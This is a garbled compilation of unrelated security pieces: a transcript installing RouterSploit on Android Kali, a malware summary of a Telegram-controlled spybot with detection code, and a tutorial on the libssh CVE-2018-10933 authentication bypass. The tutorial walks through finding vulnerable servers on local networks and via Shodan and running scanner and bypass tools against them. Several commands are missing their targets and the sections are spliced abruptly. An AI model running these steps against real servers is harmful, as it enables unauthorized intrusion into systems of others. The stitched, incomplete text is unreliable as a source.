Well, we can go ahead and use RouterSploit, which is a really fun tool, and in order to download it all we need to do is type apt install... oops, sudo apt install routersploit. Wait, now you can see, just like this, we'll type Y for yes and we can go ahead and install this really interesting and fun tool to use against routers and embedded devices on a network, and be able to use it from any Android device with a maybe five-minute installation on a fast internet connection. So this is a really cool way of getting started with some of these tools, and if you want to use RouterSploit a little bit more you can check out our tutorial on using it. But I'm going to address another problem that can be fixed with the installation of a simple tool when you're using SSH on an Android device. As you use this for a while, you'll notice that sometimes the performance of SSH doesn't keep up with whatever it is you're trying to do, and you might either get kicked out or find some other issues with using SSH. If you drop your SSH connection in the middle of doing something this can be extremely frustrating, so screen is a solution that allows you to basically disconnect from an SSH screen and then jump back into it later. If you're starting to get frustrated because your Android device is bugging out a little bit and maybe not connecting properly, you can disconnect from the screen session and then reconnect and see if it works better. This is really useful because you can even theoretically pass a screen session between devices if you're using SSH on maybe a server or Raspberry Pi, so screen is an amazing tool if you want to manage multiple SSH sessions or if you're dealing with something just by SSH. As soon as this finishes installing RouterSploit we'll go ahead and install screen, and we can do the same thing with other tools that are really useful to have on an Android device, like netcat. There we go. Now to install screen you can just type sudo apt install screen.
Now to verify we have this working we can just type man screen. It looks like we don't have the manual installed, but for now we can type screen -h; here we can learn more about how to use it and verify that we've successfully installed it. There's no doubt that it's extremely useful to have Kali running on an Android device.
Telegram SpyBot

- Anti Virtual Machine
- Anti static analysis with the usage of crypted packer
- Persistence autostart (CurrentVersion\Run) with faking lsass.exe binary
- Camouflage process names
- Send data to C2 via Telegram API (see C2 traffic)
- Bot client can handle HTTPS (crypted) session
- Clipboard capture (see decoded code)
- Screenshot capture (see the C2 traffic)
- Timer basis (see decoded code)
- Fakes webapps process (w3wp.exe or aspnet_wp.exe)
- For the C2 comm purpose: decoding (base64) & decrypting (DES) activities, etc.
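As an added example (not part of the original analysis), a small Python check for the two masquerading tricks listed above: a CurrentVersion\Run autostart whose command launches a fake lsass.exe, and processes named lsass.exe, w3wp.exe or aspnet_wp.exe running from outside the directories where those binaries legitimately live. The expected directories and the sample Run-key values and process list are constructed assumptions; on a live host you would feed in the values collected by your inventory or EDR tooling.

```python
import ntpath

# Directories where each imitated binary legitimately lives (assumed standard
# Windows, IIS and .NET Framework paths, lowercased for comparison).
EXPECTED_DIRS = {
    "lsass.exe": ("c:\\windows\\system32",),
    "w3wp.exe": ("c:\\windows\\system32\\inetsrv",),
    "aspnet_wp.exe": ("c:\\windows\\microsoft.net\\framework",
                      "c:\\windows\\microsoft.net\\framework64"),
}


def _image_path(command):
    """Pull the executable path out of a Run-key command line, which may be
    quoted ("C:\\a b\\x.exe" /arg) or bare (C:\\a\\x.exe /arg)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return (command[1:end] if end > 0 else command[1:]).lower()
    return command.split(" ", 1)[0].lower()


def _under(directory, expected):
    """True if directory is expected or a subdirectory of it (Framework\\vX.Y)."""
    return directory == expected or directory.startswith(expected + "\\")


def is_masquerade(path):
    """True if the basename is one the bot imitates and the file is not in a
    directory where that binary legitimately lives."""
    path = path.lower()
    name = ntpath.basename(path)
    if name not in EXPECTED_DIRS:
        return False
    directory = ntpath.dirname(path)
    return not any(_under(directory, d) for d in EXPECTED_DIRS[name])


def suspicious_run_entries(run_values):
    """run_values: {value name: command} read from CurrentVersion\\Run.
    Returns the value names whose command launches a masquerading binary."""
    return sorted(n for n, cmd in run_values.items()
                  if is_masquerade(_image_path(cmd)))


def suspicious_processes(processes):
    """processes: iterable of (pid, image path). Returns masquerading PIDs."""
    return sorted(pid for pid, path in processes if is_masquerade(path))


# Constructed sample snapshot: one real lsass, one fake lsass dropped under
# %APPDATA%, one fake w3wp started from %TEMP%, one real IIS worker process.
SAMPLE_RUN = {
    "OneDrive": '"C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
    "lsass": '"C:\\Users\\bob\\AppData\\Roaming\\lsass.exe"',
}
SAMPLE_PROCS = [
    (712, "C:\\Windows\\System32\\lsass.exe"),
    (4120, "C:\\Users\\bob\\AppData\\Roaming\\lsass.exe"),
    (5004, "C:\\Users\\bob\\AppData\\Local\\Temp\\w3wp.exe"),
    (2288, "C:\\Windows\\System32\\inetsrv\\w3wp.exe"),
]

if __name__ == "__main__":
    print("Run-key masquerades:", suspicious_run_entries(SAMPLE_RUN))   # ['lsass']
    print("Process masquerades:", suspicious_processes(SAMPLE_PROCS))  # [4120, 5004]
```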

Installer: 857faa89acdabc25969c21f340107742
TelegramC2 Spybot: 61034e0f0da63307fb31310ae4e491b6

In the wild spotted infection timeline:
2019-01-26 02:10:04 France
2019-01-25 08:39:45 Italy
2019-01-13 13:01:20 Germany
The installer is packed with the Enigma packer, then also self-crypted.
 enigma packer
packer sig
After unpacking, which was a challenging task in radare2, the payload can be dumped; the payload is a .NET PE binary.
The .NET binary is the Telegram C2-based Trojan Spy: it steals memory (clipboard) and captures the screen of the infected PC/machine, has a timer, and every .NET library it uses supports the bot's functionality of connecting via SSL to Telegram by API.
Anti VM to prevent behaviour test

All traffic is in HTTPS (crypted)

HTTPS Intercept result.

More data in analysis and sample detail: pastebin . com/raw/BJYbhr35
installer detection names
the spybot detection names
Just curious... to check whether the PEiD sig is actually matched or not. Hmm...
Computers around the globe rely on the libssh library. The issue with this is the disclosure of bug CVE-2018-10933. Unfortunately for hackers, this server bug was patched shortly after the disclosure. Fortunately for hackers, however, hardly anyone takes the time to update their SSH libraries, so score there.
How the Exploit Works
In a traditional SSH session, the user attempts to log in with a username and password, and depending on whether the credentials are valid, the server accepts or rejects the connection. In the example below, we attempt to log in to a server running libssh with the incorrect password by typing ssh username@ipaddress into a terminal window.
ssh root@
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:Vkx9gDp1E/df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
root@'s password:
Permission denied, please try again.
root@'s password:
Permission denied, please try again.
root@'s password:
root@ Permission denied (publickey,keyboard-interactive,password).
Because we don’t know the password, the attempt to connect is rejected, and we are kept out of the server. On top of this, we are banned from connecting to that server for some time if we try to log in too many times and fail.
In versions of libssh with the bug in question, a user can trick the system into thinking they're already authenticated by sending an unexpected message indicating the connection already succeeded, bypassing the need to supply a password. It permits an attacker to gain complete control over the affected system with no knowledge of the password, and it represents a critical vulnerability in any system with affected versions of libssh.

So How Does This Bug Work?
Imagine if you could gain access to a stranger’s house by just telling them you live there. In this trick, we skip the process of proving we belong with a password and instead send a “success” message.

This bug works when an attacker doesn’t attempt to log in the traditional way at all, and instead sends the server a message that appears to confirm that the attacker has already authenticated. This “authentication succeeded” message confuses the server into granting access without a password, wholly bypassing the normal security of the system.


The first program we'll use to scan for vulnerable devices is called Nmap, which can easily be installed. On Kali, it should be there by default, but if it’s not, you can quickly download it with the following command.
apt install nmap
To find out whether a device we discover is vulnerable, we'll be using the Python program libssh-scanner. It’s written in Python 2.7, so if you only have Python 3 installed, you'll need to make sure to also install Python 2.7.

To install libssh-scanner, you need to clone the libssh-scanner repository by typing the following into a terminal window.
git clone
Then, after navigating inside the directory and listing its contents, you need to install the required libraries by running the pip command seen below.

cd libssh-scanner
pip install -r requirements.txt
Next, you'll also need to install the program that performs the attack. This time, you’re cloning the “libSSH-Authentication-Bypass” repository and installing any dependencies using the following commands.
git clone
cd libSSH-Authentication-Bypass
pip install -r requirements.txt
The first step to fixing or exploiting a vulnerable device is finding it, and it’s relatively simple to find devices on your local network that may need attention. To do so, we'll use a program called Nmap to find devices running an SSH server and determine if libssh is running on them. Nmap is an essential tool in any hacker’s toolkit, enabling one to quickly scan and see all hosts and services on a given network or IP range.
In this case, we'll scan the devices connected locally to our network, and Nmap will tell us whether each device on the network is using a vulnerable version of libssh. To follow this guide, you'll need to install Nmap, but if you use Kali Linux, you likely already have Nmap installed.
To scan and find all devices on the local network using libssh, open a terminal window and enter the following nmap command.
nmap -sV -p22
Breaking down the command, nmap tells the computer that we want to start using Nmap, while -sV tells Nmap that we want to perform a service scan, which grabs the banner of any service running on an open port. The flag -p22 tells Nmap to only scan port 22, which is the standard port for SSH communication. While this won't find devices that use SSH on a different port, it will dramatically reduce scan times.
Finally, the target is expressed as a subnet range; the first three bytes of this will be unique to your network. When scanning a range of computers instead of only one, the 0/24 at the end is essential for searching the complete subnet. If you need to find your subnet range, you can use a tool like “ipcalc” which will calculate it for you. To do so, find your IP address by typing ifconfig, then type ipcalc yourIP (replacing “yourIP” with your IP address).
The command will return a list of devices connected to the subnet, as well as some information gathered from the scanned port. In this case we are looking for any targets that are using a version of libssh earlier than 0.7.6. You can expect to see output like the below.
Nmap scan report for
Host is up (0.0098s latency).

22/tcp closed ssh

Nmap scan report for
Host is up (0.21s latency).

22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for
Host is up (0.079s latency).

22/tcp closed ssh

Nmap scan report for
Host is up (0.024s latency).

22/tcp filtered ssh
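As an added example (not one of the tools the article uses), a Python helper that walks nmap -sV output like the above and classifies each host with port 22 open as running an affected or fixed libssh build, so a defender can turn a scan of their own network into a patch list. The hosts in the sample are placeholders, and the 0.8.x cut-off (fixed in 0.8.4) comes from the libssh security advisory rather than this article, which only mentions 0.7.6.

```python
import re

# Matches "libssh-0.7.2" in an SSH banner and "libssh 0.7.2" in nmap -sV output.
BANNER_RE = re.compile(r"libssh[-_ ]?(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)
# nmap -sV port lines look like: "22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)"
NMAP_PORT_RE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+ssh\b\s*(.*)$")
NMAP_HOST_RE = re.compile(r"^Nmap scan report for (\S+)")


def libssh_version(text):
    """Return (major, minor, patch) parsed from an SSH banner or nmap service
    string, or None if the text does not mention libssh."""
    m = BANNER_RE.search(text)
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version):
    """CVE-2018-10933 affects libssh 0.6.0 up to but excluding 0.7.6, and
    0.8.0 up to but excluding 0.8.4 (from the libssh advisory, not the article)."""
    if version < (0, 6, 0):
        return False
    if version < (0, 7, 6):
        return True
    return (0, 8, 0) <= version < (0, 8, 4)


def classify_nmap_output(lines):
    """Walk nmap -sV output and return {host: 'affected' | 'fixed' | 'other'}
    for every host whose port 22 was open ('other' = not a libssh banner)."""
    results, host = {}, None
    for line in lines:
        hm = NMAP_HOST_RE.match(line.strip())
        if hm:
            host = hm.group(1)
            continue
        pm = NMAP_PORT_RE.match(line.strip())
        if not (pm and host) or pm.group(2) != "open":
            continue  # closed/filtered ports carry no banner to judge
        ver = libssh_version(pm.group(3))
        if ver is None:
            results[host] = "other"
        else:
            results[host] = "affected" if is_affected(ver) else "fixed"
    return results


# Constructed sample modelled on the article's scan output (hosts are placeholders).
SAMPLE_NMAP = """
Nmap scan report for 10.0.0.1
Host is up (0.0098s latency).

22/tcp closed ssh

Nmap scan report for 10.0.0.2
Host is up (0.21s latency).

22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for 10.0.0.3
Host is up (0.03s latency).

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)

Nmap scan report for 10.0.0.4
Host is up (0.02s latency).

22/tcp open  ssh     libssh 0.8.4 (protocol 2.0)
""".splitlines()

if __name__ == "__main__":
    for host, verdict in classify_nmap_output(SAMPLE_NMAP).items():
        print(host, verdict)  # 10.0.0.2 affected / 10.0.0.3 other / 10.0.0.4 fixed
```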

The vast majority of vulnerable servers are accessible via a remote network, so we'll need to search in a different way to find devices not connected directly to our LAN.
To find a remote target, you'll need to make use of a service known as Shodan, a search engine that can find any device connected to the internet, unlike Google, which only returns results from web servers on port 80. For example, instead of directing you to a website trying to sell you security cameras, Shodan will direct you to the login page of functioning IP cameras, potentially granting you access to the camera if the default password is unchanged.
Shodan will have indexed many vulnerable SSH servers, which we can search for by port number and other keyword searches that reveal hosts running versions of libssh before 0.7.6, which we know to be affected by the vulnerability.
To start, register for a free account, which allows you to look at the first two pages of any search query, or about 20 unique devices. Then, to find servers vulnerable to the libssh exploit, you’ll need three terms in the search:
  • port:22, which is the default port for the SSH protocol. Even though SSH may be moved to any unused port, this isn’t too common, because all it really does is prevent the server from being found with a simple scan for port 22.
  • LibSSH, which returns any server that advertises using the libssh library, indicating that they're potentially exploitable.
  • 0.7.*, which limits the results of the search to devices that are using versions of libssh beginning with “0.7.” and excludes more up-to-date versions from the results. While you'll still get some results that are patched, you’ll eliminate most of the more updated devices with this filter.
The search above will return a list of IP addresses that may be vulnerable to this attack, along with some more information that Shodan was able to retrieve. Shodan’s info will include a banner pull, the location of the device, the latest activity, and the organization in control of the server.

Once you've gathered a list of targets liable to the exploit, either local or remote, you can use “libssh-scanner” to scan target IP addresses and determine if they’re still likely vulnerable. Other tools will go even further and try to establish a shell, but it's important to note that accessing another device using SSH without permission may violate the Computer Fraud and Abuse Act. Depending on who owns the device you access, this can land you in serious legal trouble.
In addition to legal issues, you should be wary of connecting from your real IP address to devices that might be purposely vulnerable to this exploit. Honeypots are often created this way to attract amateur hackers, and you could end up inside a device configured as a trap.
Now, use libssh-scanner to see if the targets gathered in steps 2 and 3 are really vulnerable to the exploit. To do this, create a TXT file containing all of the IP addresses found in steps 2 and 3, with each IP address on its own line. Name this text file “ips1.txt” and place it in the same folder that libssh-scanner was downloaded to earlier in step 1.
Once in the directory, enter the following command into a terminal window.
python --port 22 --aggressive ips1.txt
The command will run Python 2.7, scan every IP address in the text file, and determine if the target is really vulnerable to the CVE-2018-10933 security flaw. As you can see below, performing the scan narrowed down the list of potential targets from Shodan to only one.
python --aggressive --port 22 ips1.txt
libssh scanner 1.0.4
Searching for Vulnerable Hosts...
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
! is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')
* is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
Scanner Completed with success
To check the one result, use libSSH-Authentication-Bypass to test the attack. Change directory into the folder you downloaded libSSH-Authentication-Bypass to previously in step 1, and enter the following command, replacing “” with the IP address you want to scan.
python3 --host
The command returns the following output on a server that has been partially patched but is still vulnerable to the authentication bypass.
python3 --host
DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', ''] server compress:['none', 'zlib', ''] client lang:[''] server lang:[''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: 
If you see a message indicating the connection is successful, then you’ve confirmed the vulnerability on the device you’re testing. If the connection fails, or you see a partially successful result like the one above, then you’ve confirmed that the issue doesn't affect the target (even though it should be updated anyway if you get a partial success).